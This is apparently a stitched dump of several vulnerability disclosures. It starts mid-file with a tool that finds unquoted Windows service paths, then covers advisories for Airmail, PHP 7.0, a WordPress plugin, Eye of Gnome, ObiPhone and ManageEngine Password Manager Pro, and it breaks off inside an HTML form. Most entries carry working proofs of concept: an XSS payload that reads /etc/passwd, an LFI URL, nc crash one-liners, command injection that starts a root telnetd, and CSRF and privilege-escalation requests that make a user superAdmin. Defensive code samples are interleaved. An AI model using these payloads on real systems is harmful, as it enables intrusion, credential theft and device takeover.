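        DEPENDENCIES       : ASMMAP64
        SERVICE_START_NAME : LocalSystem
"""

_BINARY_PATH_RE = re.compile(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", re.MULTILINE)
_START_NAME_RE = re.compile(r"^\s*SERVICE_START_NAME\s*:\s*(.*?)\s*$", re.MULTILINE)


def binary_path(sc_qc_output):
    """Extract BINARY_PATH_NAME from `sc qc` output, or None if absent."""
    m = _BINARY_PATH_RE.search(sc_qc_output)
    return m.group(1) if m else None


def service_account(sc_qc_output):
    m = _START_NAME_RE.search(sc_qc_output)
    return m.group(1) if m else None


def is_unquoted_with_spaces(path):
    """Exploitable only when the path is not quoted and contains a space."""
    return not path.startswith('"') and " " in path


def hijack_candidates(path):
    """The executables Windows tries, in order, for an unquoted path: every
    space-delimited prefix with .exe appended, ending with the real binary.
    Writing any earlier candidate gives code execution as the service
    account on the next service start."""
    if not is_unquoted_with_spaces(path):
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        cand = " ".join(parts[:i])
        if not cand.lower().endswith(".exe"):
            cand += ".exe"
        candidates.append(cand)
    return candidates


def report(sc_qc_output):
    """Summarise one service: path, account it runs as, and hijack candidates."""
    path = binary_path(sc_qc_output) or ""
    return {
        "path": path,
        "runs_as": service_account(sc_qc_output),
        "vulnerable": is_unquoted_with_spaces(path),
        "candidates": hijack_candidates(path)[:-1],   # the last entry is the real binary
    }


if __name__ == "__main__":
    for k, v in report(SAMPLE_SC_QC).items():
        print(f"{k:>10}: {v}")
```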
Airmail is a popular email client on iOS and OS X.
I found a vulnerability in the latest version of Airmail which can lead to
a file:// XSS and arbitrary file read.
Author: redrain, yu.hong@chaitin.com
Date: 2016-08-15
Version: 3.0.2 and earlier
Platform: OS X and iOS
Site: http://airmailapp.com/
Vendor: http://airmailapp.com/
Vendor Notified: 2016-08-15
Vulnerability:
There is a file:// xss in airmail version 3.0.2 and earlier.
The app renders URL schemes through its link detection, so any user can
place the malicious link in the body of a reply.
Airmail implements its user interface using an embedded version of WebKit,
furthermore Airmail on OS X will render any URI as a clickable HTML <a
href= link. An attacker can create a simple JavaScript URI (e.g.,
javascript:) which when clicked grants the attacker initial JavaScript
execution (XSS) in the context of the application DOM.
PoC:
javascript://www.baidu.com/research?%0Aprompt(1)
Arbitrary file read:
javascript://www.baidu.com/research?%0Afunction%20reqListener%20()%20%7B%0A%20%20prompt(this.responseText)%3B%0A%7D%0Avar%20oReq%20%3D%20new%20XMLHttpRequest()%3B%0AoReq.addEventListener(%22load%22%2C%20reqListener)%3B%0AoReq.open(%22GET%22%2C%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22)%3B%0AoReq.send()%3B
<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
    public $obj;
    function __clone()
    {
        // Cloning $this from inside __clone() re-enters __clone() with no base
        // case, so the recursion never ends and the interpreter exhausts its stack.
        $this->obj = clone $this;
        return $this->obj;
    }
}
$obj = new MyCloneableClass();
$obj2 = clone $obj;
?>
[+] Date: [23-8-2016]
[+] Author Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion
A File Inclusion vulnerability allows an attacker to include a file, usually by abusing a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs because user-supplied input is used without proper validation.
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);
This looks like a perfect place to try for LFI. Because the script includes the input parameter directly instead of selecting a page by name from a fixed array, it is possible to include arbitrary files on the server.
Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
# Exploit Title: Gnome Eye of Gnome Out-of-bounds-write
# Exploit Author: Kaslov Dmitri
# Vendor Homepage: https://wiki.gnome.org/Apps/EyeOfGnome
# Version: 3.10.2
# Tested on: Ubuntu 14.04 LTS
# CVE: CVE-2016-6855
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40291.zip
Reported: 19-August-2016
Fixed: 21-August-2016 (fix will go into next software release)
GMarkup requires valid UTF8 input strings and would cause odd
looking messages if given invalid input. This could also trigger an
out-of-bounds write in glib before 2.44.1
ObiHai ObiPhone - Multiple Vulnerabilities
------------------------------------------
Introduction
============
Multiple vulnerabilities were discovered in the web management
interface of the ObiHai ObiPhone products. The Vulnerabilities were
discovered during a black box security assessment and therefore the
vulnerability list should not be considered exhaustive.
Affected Devices and Versions
=============================
ObiPhone 1032/1062 with firmware less than 5-0-0-3497.
Vulnerability Overview
======================
Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length
Vulnerability Details
=====================
----------------------------------------------------------------------------
Obi-1. Memory corruption leading to free() of an attacker-controlled address
----------------------------------------------------------------------------
By providing a long URI (longer than 256 bytes) not containing a slash in a
request, a pointer is overwritten which is later passed to free(). By
controlling the location of the pointer, this would allow an attacker to affect
control flow and gain control of the application. Note that the free() seems to
occur during cleanup of the request, as a 404 is returned to the user before the
segmentation fault.
python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479d8b18 in free () from root/lib/libc.so.6
#1 0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>: ldr r3, [r0, #-4]
0x479d8b1c <free+52>: sub r5, r0, #8
0x479d8b20 <free+56>: tst r3, #2
0x479d8b24 <free+60>: bne 0x479d8bec <free+260>
0x479d8b28 <free+64>: tst r3, #4
(gdb) i r r0
r0 0x41 65
---------------------------------------
Obi-2. Command injection in WiFi Config
---------------------------------------
An authenticated user (including the lower-privileged "user" user) can enter a
hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet
daemon.
GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]
Note that telnetd is now running and accessible via user "root" with no
password.
-----------------------------------------------
Obi-3. Denial of Service due to buffer overflow
-----------------------------------------------
By providing a long URI (longer than 256 bytes) beginning with a slash, memory
is overwritten beyond the end of mapped memory, leading to a crash. Though no
exploitable behavior was observed, it is believed that memory containing
information relevant to the request or control flow is likely overwritten in the
process. strcpy() appears to write past the end of the stack for the current
thread, but it does not appear that there are saved link registers on the stack
for the devices under test.
python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479dc440 in strcpy () from root/lib/libc.so.6
#1 0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
0x479dc44c <strcspn>: push {r4, r5, r6, lr}
0x479dc450 <strcspn+4>: ldrb r3, [r0]
(gdb) i r r1 r2
r1 0xb434df01 3023363841
r2 0xff 255
(gdb) p/x $r1+$r2
$1 = 0xb434e000
-------------------------------------------------
Obi-4. Buffer overflow in internal socket handler
-------------------------------------------------
Commands to be executed by realtime backend process `obid` are sent
via Unix domain sockets from obiapp.
In formatting the message for the Unix socket, a new string is constructed on
the stack. This string can overflow the static buffer, leading to control of
program flow. The only vectors leading to this code that were discovered during
the assessment were authenticated, however unauthenticated code paths may exist.
Note that the example command can be executed as the lower-privileged "user"
user.
GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]
(gdb)
#0 0x41414140 in ?? ()
#1 0x0006dc78 in ?? ()
---------------------------------
Obi-5. Cross-site request forgery
---------------------------------
All portions of the web interface appear to lack any protection against
Cross-Site Request Forgery. Combined with the command injection vector in
Obi-2, this would allow a remote attacker to execute arbitrary shell
commands on the phone, provided the victim's browser session was logged in to
the phone.
----------------------------------------------
Obi-6. Failure to implement RFC 2617 correctly
----------------------------------------------
RFC 2617 specifies HTTP digest authentication, but is not correctly implemented
on the ObiPhone. The HTTP digest authentication fails to comply in the
following ways:
- The URI is not validated
- The application does not verify that the nonce received is the one it sent
- The application does not verify that the nc value does not repeat or go
backwards
GET / HTTP/1.1
Host: foo
Authorization: Digest username="admin", realm="a", nonce="a", uri="/",
algorithm=MD5, response="309091eb609a937358a848ff817b231c",
opaque="", qop=auth,
nc=00000001, cnonce="a"
Connection: close
HTTP/1.1 200 OK
Server: OBi110
Cache-Control:must-revalidate, no-store, no-cache
Content-Type: text/html
Content-Length: 1108
Connection: close
Please note that the realm, nonce, cnonce, and nc values have all been chosen
and the response generated offline.
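The three omissions listed under Obi-6 are each a one-line check on the server side. The verifier below is an added example written for this advisory, not code from the ObiPhone firmware; the realm, user store and password are constructed. It issues nonces, refuses any nonce it did not issue, requires the `uri` parameter to equal the request line's target, requires `nc` to be hexadecimal and strictly increasing per nonce, and compares the RFC 2617 `qop=auth` response in constant time. The header from the request above (nonce "a", chosen offline) parses fine but is rejected at the first check.

```python
import hashlib
import re
import secrets


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response for qop=auth: MD5(HA1 ":" nonce ":" nc ":" cnonce ":" qop ":" HA2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_header(value: str):
    """Turn 'Digest k="v", k2=v2, ...' into a dict; None if it is not a Digest header."""
    if not value.startswith("Digest "):
        return None
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM.finditer(value[len("Digest "):])}


class DigestVerifier:
    """Server-side verification enforcing the three points Obi-6 says the phone skips."""

    def __init__(self, realm: str, users: dict):
        self.realm = realm
        self.users = users      # username -> password; constructed demo store
        self.nonces = {}        # nonce we issued -> highest nc accepted so far

    def issue_nonce(self) -> str:
        nonce = secrets.token_hex(16)
        self.nonces[nonce] = 0
        return nonce

    def verify(self, method: str, request_uri: str, params: dict):
        nonce = params.get("nonce")
        if nonce not in self.nonces:                 # 1. nonce must be one *we* sent
            return False, "unknown nonce"
        if params.get("uri") != request_uri:         # 2. uri must match the request line
            return False, "uri mismatch"
        try:
            nc = int(params.get("nc", ""), 16)       # 3. nc is hex and strictly increasing
        except ValueError:
            return False, "bad nc"
        if nc <= self.nonces[nonce]:
            return False, "nc replay"
        username = params.get("username")
        password = self.users.get(username)
        if password is None:
            return False, "unknown user"
        expected = digest_response(username, self.realm, password, method, request_uri,
                                   nonce, params["nc"], params.get("cnonce", ""),
                                   params.get("qop", "auth"))
        if not secrets.compare_digest(expected, params.get("response", "")):
            return False, "bad response"
        self.nonces[nonce] = nc                      # advance the counter only on success
        return True, "ok"


if __name__ == "__main__":
    v = DigestVerifier("a", {"admin": "demo-password"})
    offline = parse_digest_header('Digest username="admin", realm="a", nonce="a", uri="/", '
                                  'qop=auth, nc=00000001, cnonce="a", response="00"')
    print(v.verify("GET", "/", offline))            # (False, 'unknown nonce')
```

Nonces should also expire and be bound to the client session in a real deployment; the dictionary here is the minimum needed to show the nonce and nc checks the phone lacked.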
--------------------------------------------------------
Obi-7. Invalid pointer dereference due to invalid header
--------------------------------------------------------
Sending an invalid HTTP Authorization header, such as
"Authorization: foo", causes the program to attempt to read from an invalid
memory address, leading to a segmentation fault and reboot of the device. This
requires no authentication, only access to the network to which the device is
connected.
GET / HTTP/1.1
Host: foo
Authorization: foo
This causes the server to dereference the address 0xFFFFFFFF, presumably
returned as a -1 error code.
(gdb) bt
#0 0x479dc438 in strcpy () from root/lib/libc.so.6
#1 0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>: ldrb r3, [r1, #1]!
0x479dc43c <strcpy+12>: cmp r3, #0
0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
(gdb) i r r1
r1 0xffffffff 4294967295
----------------------------------------------------
Obi-8. Null pointer dereference due to malicious URL
----------------------------------------------------
If the /obihai-xml handler is requested without any trailing slash or component,
this leads to a null pointer dereference, crash, and subsequent reboot of the
phone. This requires no authentication, only access to the network to which the
device is connected.
GET /obihai-xml HTTP/1.1
Host: foo
(gdb) bt
#0 0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args:
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>: ldr r2, [r1], #4
0x479dc7f8 <strlen+8>: ands r3, r0, #3
0x479dc7fc <strlen+12>: rsb r0, r3, #0
0x479dc800 <strlen+16>: beq 0x479dc818 <strlen+40>
0x479dc804 <strlen+20>: orr r2, r2, #255 ; 0xff
(gdb) i r r1
r1 0x0 0
------------------------------------------------------
Obi-9. Denial of service due to invalid content-length
------------------------------------------------------
Content-Length headers of -1, -2, or -3 result in a crash and device reboot.
This does not appear exploitable to gain execution. Larger (more negative)
values return a page stating "Firmware Update Failed" though it does not appear
any attempt to update the firmware with the posted data occurred.
POST / HTTP/1.1
Host: foo
Content-Length: -1
Foo
This appears to write a constant value of 0 to an address controlled by the
Content-Length parameter, but since it appears to be relative to a freshly
mapped page of memory (perhaps via mmap() or malloc()), it does not appear this
can be used to gain control of the application.
(gdb) bt
#0 0x00138250 in HTTPD_msg_proc ()
#1 0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>: strb r1, [r3, r2]
0x138254 <HTTPD_msg_proc+400>: ldr r1, [r4, #24]
0x138258 <HTTPD_msg_proc+404>: ldr r0, [r4, #88] ; 0x58
0x13825c <HTTPD_msg_proc+408>: bl 0x135a98
0x138260 <HTTPD_msg_proc+412>: ldr r0, [r4, #88] ; 0x58
(gdb) i r r3 r2
r3 0xafcc7000 2949410816
r2 0xffffffff 4294967295
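Obi-3, Obi-7 and Obi-9 are all failures to validate the request head before using it: an unbounded copy of the request target, an Authorization header with no credentials, and a Content-Length that is parsed as a signed integer. The checks below are an added example, not the ObiPhone's code; the length caps are constructed values. `check_request` rejects each of the three malformed requests shown in this advisory and accepts the well-formed `/obihai-xml` one (whose null-pointer bug lives in the handler, not the parser).

```python
import re
from typing import Optional, Tuple

MAX_BODY = 1 << 20    # constructed cap on an accepted body size
MAX_TARGET = 255      # constructed cap on the request-target length

_DIGITS = re.compile(r"[0-9]+")


def parse_content_length(value: str) -> Optional[int]:
    """Accept only RFC 7230's 1*DIGIT: no sign, no decimal point, no oversized value."""
    v = value.strip()
    if not _DIGITS.fullmatch(v):
        return None
    n = int(v)
    return n if n <= MAX_BODY else None


def parse_authorization(value: str) -> Optional[Tuple[str, str]]:
    """Split 'Scheme credentials'. A bare token such as 'foo' has no credentials."""
    parts = value.strip().split(None, 1)
    if len(parts) != 2 or not parts[1].strip():
        return None
    scheme, creds = parts[0].lower(), parts[1].strip()
    if scheme not in ("basic", "digest"):
        return None
    return scheme, creds


def check_request(raw: str) -> str:
    """Validate the head of an HTTP/1.1 request before any handler touches it."""
    lines = raw.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return "reject: malformed request line"
    if len(parts[1]) > MAX_TARGET:                  # Obi-3: bound before any copy
        return "reject: request-target too long"
    headers = {}
    for line in lines[1:]:
        if line == "":
            break                                   # end of the header block
        if ":" not in line:
            return "reject: malformed header"
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers and parse_content_length(headers["content-length"]) is None:
        return "reject: bad content-length"         # Obi-9: -1, -2, -3 never reach int()
    if "authorization" in headers and parse_authorization(headers["authorization"]) is None:
        return "reject: bad authorization"          # Obi-7: no credential part to dereference
    return "ok"


if __name__ == "__main__":
    print(check_request("POST / HTTP/1.1\r\nHost: foo\r\nContent-Length: -1\r\n\r\nFoo"))
```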
Mitigation
==========
Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.
Author
======
The issues were discovered by David Tomaschik of the Google Security Team.
Timeline
========
- 2016/05/12 - Reported to ObiHai
- 2016/05/12 - Findings Acknowledged by ObiHai
- 2016/05/20 - ObiHai reports working on patches for most issues
- 2016/06/?? - New Firmware posted to ObiHai Website
- 2016/08/18 - Public Disclosure
[Systems Affected]
Product : ManageEngine Password Manager Pro
Company : ZOHO Corp.
Build Number : 8.1 to 8.3 and probably earlier versions
Affected Versions : 8102 to 8302 and probably earlier versions
[Product Description]
Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.
[Vulnerabilities]
Multiple vulnerabilities were identified within this application:
1- Stored XSS in /AddMail.ve
2- Privilege escalation in /EditUser.do
3- Business Logic Bypass in /EditUser.do
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
7- Password brute force for resource accounts in /jsp/xmlhttp/AjaxResponse.jsp
8- Cross-Site Request Forgery
[Advisory Timeline]
17/07/2015 - Discovery and vendor notification
17/07/2015 - ManageEngine responded that they would notify their
development team
13/10/2015 - ManageEngine informed that they had fixed these issues
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
15/10/2015 - Test on Beta build version 8300 was performed, confirming
the fix of issues 2, 4, 7 and part of issue 8
02/11/2015 - ManageEngine asked for more time to fix the remaining issues
before making this public
29/12/2015 - ManageEngine contacted for an update - No reply
12/01/2016 - ManageEngine contacted for an update - No reply
08/02/2016 - ManageEngine contacted for an update - small update provided
12/02/2016 - Last communication from ManageEngine
04/04/2016 - Public Disclosure
[Patch Available]
Password Manager Pro Release 8.3 (8300) (Released October 2015)
fixes issues #2, #4, #7 and partially #8
Password Manager Pro Release 8.3 (8303) (Released December 2015)
fixes issues #1, #3, #5 and #6
[Exploit]
There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2) and elevates a regular user to
SuperAdmin, and then downloads the passwords and files stored within
the application. The exploit code is available here
- https://github.com/s3bap3/pmp-exploit
[Description of Vulnerabilities]
(1) Stored XSS in /AddMail.ve.
This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an HTML
form can be forged to create a personal account and exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this:
[PoC]
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
(2) Privilege escalation in /EditUser.do, which allows two things.
a- Hijacking users' sessions by changing their email addresses and
using the forgot-password functionality.
The affected parameter is "EMAIL" of the /EditUser.do page.
Any user (even one with the PASSWORD USER role) can send a crafted POST
request like the one below to change a user's email address, which is
used to deliver a new password when the previous one has been
forgotten. The only attribute that needs to change from one request to
another is LOGINID, a sequence number representing the user's numeric
ID.
b- Escalating privileges by changing the user's role from Password
User to superadmin.
By forging a similar request it is possible to raise our own
privileges. For example, the "ROLE" parameter can be changed to
"Password Auditor", "Password Administrator" or even "Administrator".
It is also possible to become a superAdmin by changing the "superAdmin"
parameter from false to true, which gives control of the application
and of all the passwords stored in it. To become superAdmin, the user
role needs to be Administrator; both changes can be made in the same
request. In this scenario there are two parameters to be aware of:
- USERID and LOGINID: the numeric account id to which the superadmin
attribute will be granted (it can be obtained from the login reply)
- USER: the username to which the superadmin attribute will be granted
[PoC]
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------20780287114832
-----------------------------20780287114832
Content-Disposition: form-data; name="isloginusersa"
false
-----------------------------20780287114832
Content-Disposition: form-data; name="superadminscope"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="SERVERPORT"
7272
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="USERID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="LOGINID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="USER"
username
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDLANG"
en
-----------------------------20780287114832
Content-Disposition: form-data; name="EMAIL"
pwned@user.com
-----------------------------20780287114832
Content-Disposition: form-data; name="ROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="superAdmin"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="Rule"
Strong
-----------------------------20780287114832
Content-Disposition: form-data; name="DEPT"
-----------------------------20780287114832
Content-Disposition: form-data; name="LOCATION"
-----------------------------20780287114832
Content-Disposition: form-data; name="mobileaccess"
enable
-----------------------------20780287114832
Content-Disposition: form-data; name="UserCert"; filename=""
Content-Type: application/octet-stream
-----------------------------20780287114832
Content-Disposition: form-data; name="lang_code"
en
-----------------------------20780287114832--
(3) Business Logic Bypass in /EditUser.do
The application only allows the creation of a certain number of
Administrators, based on the licence. However, it is possible to create
more. To exploit this, go to the user administration page and edit a
user. Save the edit without making any modification and intercept that
POST message. Set both parameters "OLDROLE" and "ROLE" to the role
"Administrator", and the user's role will be changed to it. Every user
can be converted to an administrator even if the licence does not allow
that many. The application only checks the number of administrators
when "ROLE" is Administrator but "OLDROLE" is a different role.
(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
Every time the password of a user account or of a resource's user
account is changed, a request is sent to this path to validate the
password against the password policy. Apart from the fact that the
password is sent in the URL (so it can be logged by any proxy or by the
browser), the policy the password is evaluated against can be changed
by modifying the "Rule" parameter from its current value to "Low", so
that a weaker policy is applied. For example:
[PoC]
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same applies when a Listener
needs to be suspended. However, this can be bypassed: the same
administrator can both create and approve the listener by forging a
GET request like the following. The only parameter that needs to be
changed is "LISTENERID", a sequence number that identifies the
Listener.
[PoC]
Listener Approval
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
Listener Suspension
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
(6) Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
It is possible to enumerate a resource's user accounts by forging a
GET request as follows. This URL allows a user who has access to
retrieve the account password. If the user does not have access,
however, the error message differs depending on whether the account
exists. The only parameters that need to be modified are "resource"
and "account".
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
The error message identifies whether the account exists for that resource.
Account exists: ____ACCESS___DENIED__
Resource/Account does not exist: FAILURE
(7) Password brute force for resource accounts in /jsp/xmlhttp/AjaxResponse.jsp
It is possible to guess a resource account's password by forging a
GET request as follows. This URL is used to validate a password
against the configured password policy. Since the policy can be
changed, the "Low" policy can be selected, which still does not allow
reusing the password currently set for the account. If an error
message appears saying the password cannot be reused, the submitted
value is the account's current password.
The only parameters that need to be modified are "password" and
"ACCID"; the password policy parameter "Rule" must be set to Low.
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
The error message identifies whether the password is correct
for every user account.
Password matches: "Password cannot be same as last 1 passwords"
Password does not match: "SUCCESS"
Account ID does not exist: "Error in validating password policy"
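Issues 4, 6 and 7 share two root causes: the policy to apply is chosen by the client, and the endpoint answers before checking whether the caller may even touch that account, so its distinct messages become an oracle. The code below is an added example, not Password Manager Pro's code; the accounts, policies and passwords are constructed. `validate_password_vulnerable` mirrors the behaviour the advisory describes, and the hardened variants bind the policy to the stored account and return one uniform "FAILURE" for both "no such account" and "not yours", so the reuse message is only reachable by a user who can already read that password. Moving the password out of the query string into a POST body is the remaining fix the advisory asks for.

```python
import hmac
from typing import Optional

# Constructed stand-in for the application's stored policies and resource accounts.
POLICIES = {"Low": {"min_len": 1}, "Strong": {"min_len": 12}}
ACCOUNTS = {
    5: {"resource": "admin resource", "account": "admin", "policy": "Strong",
        "password": "Xk9#mP2$vL7@qR4w", "allowed_users": {"alice"}},
    8: {"resource": "db01", "account": "svc_backup", "policy": "Strong",
        "password": "Backup-Pass-2016!", "allowed_users": {"bob"}},
}
REUSE_MSG = "Password cannot be same as last 1 passwords"


def validate_password_vulnerable(params: dict) -> str:
    """The advisory's behaviour: the client picks the policy via 'Rule', nobody checks
    who is asking, and the reuse message confirms the current password to anyone."""
    try:
        acc = ACCOUNTS[int(params.get("ACCID", ""))]
    except (ValueError, KeyError):
        return "Error in validating password policy"   # distinct message: id oracle
    candidate = params.get("password", "")
    if candidate == acc["password"]:
        return REUSE_MSG                                 # distinct message: password oracle
    rule = POLICIES.get(params.get("Rule", "Strong"), POLICIES["Strong"])
    return "FAILURE" if len(candidate) < rule["min_len"] else "SUCCESS"


def _lookup_authorized(session_user: str, acc_id) -> Optional[dict]:
    """One answer for 'no such account' and 'not yours': nothing to enumerate."""
    try:
        acc = ACCOUNTS.get(int(acc_id))
    except (TypeError, ValueError):
        acc = None
    if acc is None or session_user not in acc["allowed_users"]:
        return None
    return acc


def validate_password_hardened(session_user: str, params: dict) -> str:
    acc = _lookup_authorized(session_user, params.get("ACCID"))
    if acc is None:
        return "FAILURE"
    rule = POLICIES[acc["policy"]]          # policy is bound to the account, not the request
    candidate = params.get("password", "")
    if len(candidate) < rule["min_len"]:
        return "FAILURE"
    if hmac.compare_digest(candidate, acc["password"]):
        return REUSE_MSG                    # only reachable by a user entitled to read it
    return "SUCCESS"


def retrieve_password_hardened(session_user: str, resource: str, account: str) -> str:
    """Issue 6 counterpart: an unknown account and an unauthorized one look the same."""
    for acc in ACCOUNTS.values():
        if acc["resource"] == resource and acc["account"] == account:
            if session_user in acc["allowed_users"]:
                return acc["password"]
            break
    return "FAILURE"


if __name__ == "__main__":
    print(validate_password_vulnerable({"ACCID": "8", "password": "Backup-Pass-2016!", "Rule": "Low"}))
    print(validate_password_hardened("mallory", {"ACCID": "8", "password": "Backup-Pass-2016!"}))
```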
(8) Cross-Site Request Forgery
The application is vulnerable to Cross-Site Request Forgery: by
sending specific POST messages it is possible to create a user in the
system (1), elevate privileges for a user (2)(4), and store an XSS in
the user's personal passwords (3). The PoCs follow.
[PoC]
User Creation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
<input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
<input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="" name="dept" type="hidden"><input
value="true" type="hidden">
<input value="false" name="location"
type="hidden"><input value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
<input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
<input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
<input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
